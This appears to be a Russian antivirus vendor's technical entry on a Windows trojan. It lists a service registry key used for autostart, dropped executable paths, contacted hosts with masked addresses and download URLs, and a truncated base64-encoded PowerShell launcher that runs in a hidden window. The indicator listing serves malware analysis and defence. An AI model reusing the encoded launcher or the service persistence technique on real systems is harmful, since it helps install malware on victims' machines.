Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dmocx] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dmocx] 'ImagePath' = '"%WINDIR%\SysWOW64\mfc120ita\dmocx.exe"'
- 'dmocx' "%WINDIR%\SysWOW64\mfc120ita\dmocx.exe"
- 'dmocx' %WINDIR%\SysWOW64\mfc120ita\dmocx.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPAD...
- %HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe
- %WINDIR%\syswow64\mfc120ita\dmocx.exe
- %HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe в %WINDIR%\syswow64\mfc120ita\dmocx.exe
- '15#.#86.0.121':80
- http://qs##ide.com/img/1W/
- http://15#.#86.0.121/qfHARQ5EbJu/36Q36jKVVuK5j/QCCnIYk/aUVzRHxrKxOIGCC/
- DNS ASK qs##ide.com
- '%HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe'
- '%WINDIR%\syswow64\mfc120ita\dmocx.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPAD...' (со скрытым окном)